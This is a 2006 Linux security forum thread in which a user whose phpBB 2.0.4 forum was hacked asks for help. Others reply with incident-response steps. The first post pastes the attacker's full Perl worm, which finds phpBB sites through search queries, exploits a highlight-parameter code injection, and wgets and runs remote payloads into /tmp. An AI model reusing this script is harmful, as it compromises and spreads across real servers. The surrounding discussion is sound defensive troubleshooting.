LinuxQuestions.org
Download your favorite Linux distribution at LQ ISO.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 04-17-2006, 10:46 AM   #1
matthewchin
Member
 
Registered: Jun 2003
Posts: 40

Rep: Reputation: 15
Hacked - pls help


Dear All,

**** pls excuse me if this was NOT posted to a correct category ****

My phpBB (/var/www/html/phpBB2 running in FC3) wrongly allow 777 and attacked by this hacker
(ip=81.196.20.134)
the /tmp/.666 and /tmp/.lick are invoked continuously seems phpBB is run.

And result in substantial problem on the sh (defunct) (zombie) processes.

I want expert advice:

1) how it is invoked?
2) how to STOP ?
3) now I only deny from the ip for access /var/www/html using .htaccess.

Mathew


------------------- lick.txt -------------------------

#### Nu exista patch pentru prostia umana #####
########### Romania #########################
###### Crash@WhiteHat.Cc ######

use strict;
use IO::Socket;
use IO::Handle;


my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
my $pid=fork;


sub fetch();
sub remote($);
sub http_query($);
sub encode($);

sub fetch(){
my $rnd=(int(rand(9999)));
my $s= (int(rand(1000)));
if ($rnd>1000) { $s= (int(rand(100)))}



my @str=(
"%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22",
"%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22+topic+777",
"viewtopic.php%3Ft",
"%22View+next+topic%22",
"%22View+previous+topic%22",
"viewtopic.php+%22Log+in+to+check+your+private+messages%22",
"%22Powered+by+phpBB%22+v-i-e-w-t-o-p-i-c-.-p-h-p",
"%22P-o-w-e-r-e-d+b-y+p-h-p-B-B%22",
"viewtopic.php+%22by+phpBB+2001%22",
"viewtopic.php+%22by+phpBB+2000%22",
"viewtopic.php+%22by+phpBB+2002%22",
"viewtopic.php+by+phpBB+2003%22",
"viewtopic.php+%22by+phpBB+2004%22",
"%22ALEKS+HACKED+YOUR+SYSTEM%22",
"viewtopic.php+%22by+phpBB+2005%22",
"viewtopic.php+%22by+phpBB+2006%22",
"intitle%3A%22%3A%3A+View+topic%22",
"viewtopic.php+%22+phpBB+Group%22",
"%22topic.php%3Ft%3D%22",
"%22%3A%3A+View+topic%22",
);

my $query="search.msn.com/results.aspx?q=";
$query.=$str[(rand(scalar(@str)))].$rnd;
$query.="&first=$s";

my @lst=();
my $page = http_query($query);
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/msn|cache|hotmail/){
push (@lst,$1);
}
}

return (@lst);
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;

}

sub encode($) {
my $s = shift;
$s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
$s =~ s/%252E$//;
return $s;
}



eval {fork and exit;};

my $iam=$ARGV[0];
my $oneday=time+3600;
my $page="";
my @urls;
my $url;






while(time<$oneday){
@urls=fetch();
foreach $url (@urls) {
if ($url !~ /viewtopic.php/) {next;}
$url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/;
my $cmd=encode("perl -e \"print q(jSVowMsd)\"");
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
if ( $page =~ /jSVowMsd/ ){
$url =~ s/&highlight.*//;
my $upload=$url;
$upload =~ s/viewtopic.*//;
$cmd="wget http://lakexxx.go.ro/xpl.txt -O /tmp/.lick;perl /tmp/.lick"; # set cmd
$cmd=encode("$cmd"); # set cmd
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
$cmd="wget http://lakexxx.go.ro/bot.txt -O /tmp/.666;perl /tmp/.666;touch /tmp/.666";
$cmd=encode("$cmd"); # set cmd
$url =~ s/&highlight.*//;
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
}

}
}
 
Old 04-17-2006, 11:41 AM   #2
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
1) how it is invoked?
Likely through a vulnerable version of phpBB, so the processes running on the system will be that of the user that Apache is run under (for Fedora it's usually "apache"). ps -U apache will give a listing of everything running under that user. Also take a look at your httpd logs in /var/log/httpd/access_log and see if you can find the exect commands that have been executed.

2) how to STOP ?
Kill off the rogue processes. If they keep respawning, try stopping Apache.

3) now I only deny from the ip for access /var/www/html using .htaccess.
I'd use iptables instead and completely ban the IP from all ports just in case you have some backdoor shell listening on another port. Use iptables -I INPUT -s X.X.X.X -j DROP

That may or may not help. If your system has been extensively compromised then simply adding an iptables rule likely will be ineffective. You'll need to do some extensive forensic analysis on the system in order to identify how significant the compromise was. Personally I consider any level of access to be significant enough to warrant a complete re-install, but some consider that excessive.

Start by taking a listing of all processes running on the system and of all network connections (netstat -pantu). Post any processes or connections that don't look normal or you don't know what they are. Take a look through the system logs, including /var/log/secure /var/log/messages and all of the httpd logs. Look for any strange logins in the output of last -i. Get a list of all SUID/SGID root files on the system with find / -perm 2000 -o -perm 4000. Look at /etc/passwd for any new users or users other than root with a UID of 0.
 
Old 04-17-2006, 10:08 PM   #3
matthewchin
Member
 
Registered: Jun 2003
Posts: 40

Original Poster
Rep: Reputation: 15
Thanks Capt Caveman,

2) how to STOP ?
Kill off the rogue processes. If they keep respawning, try stopping Apache.

I meant how can I stopped/remove those rogue processes from invoking, cannot locate where and how they are started..... any hints ?
 
Old 04-17-2006, 10:45 PM   #4
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
They're likely either started by a master script that is already running, directly through phpBB, or possibly by cron. If you kill them do they respawn automatically or do they only start up at certain times (like on boot or at a cetain time of day)?

Who owns the rogue processes (do 'ps aux' and see who the owner is)? Also run pstree and take a look at the rogue processes to see if they are being run by some other script.

It's probably a good idea to remove this system from the internet at least until you can verify that it's clean. Plus if the script is being started remotely using the phpBB exploit, then the cracker can simply just restart it.
 
Old 04-18-2006, 12:29 AM   #5
matthewchin
Member
 
Registered: Jun 2003
Posts: 40

Original Poster
Rep: Reputation: 15
Thanks Capt Caveman

the processes keep start recursively. I just want to stop this, but still unable to locate how they are started. More hints ?

Matthew
 
Old 04-18-2006, 02:12 AM   #6
MS3FGX
LQ Guru
 
Registered: Jan 2004
Location: NJ, USA
Distribution: Slackware, Debian
Posts: 5,852

Rep: Reputation: 361Reputation: 361Reputation: 361Reputation: 361
If you reboot the machine with Apache and all of your services turned off, do the processes come back up?

If so, then they must be getting started from the init scripts, cron, or perhaps inetd.
 
Old 04-18-2006, 05:08 AM   #7
matthewchin
Member
 
Registered: Jun 2003
Posts: 40

Original Poster
Rep: Reputation: 15
Thanks MS3FGX,

Correct they come up again after each reboot, and causing machine eventually slow down.

as too may files exist, any hints to more easy identification of them ?

Thanks,
Matthew
 
Old 04-18-2006, 06:44 PM   #8
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Could you post a full list of all the process on the system (ps aux)? (Pls post this regardless of other data)

What does rpm -Va produce?

Does /etc/crontab or /etc/cron.d/ contain any references to .lick?

Does /var/log/messages contain anything relevent?

If you start in single-user mode, do the processes still appear?
 
Old 04-19-2006, 12:18 AM   #9
matthewchin
Member
 
Registered: Jun 2003
Posts: 40

Original Poster
Rep: Reputation: 15
Finally remove the phpBB 2.0.4, and resinatall the new version. - FIXED.
Thank you all for help.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Does this mean I've been hacked?? ozymandias Linux - Security 3 09-23-2005 07:05 AM
pls pls pls help me ! i'm tired with httpd config on fedora apache 2.0.48 AngelOfTheDamn Fedora 0 01-24-2004 06:12 PM
hacked WannaLearnLinux Linux - Newbie 7 10-18-2003 02:34 AM
I think I've been hacked! Crashed_Again Linux - Security 7 12-31-2002 08:14 PM
Have I been hacked amp2000 Linux - Security 13 12-17-2002 04:16 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 04:59 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration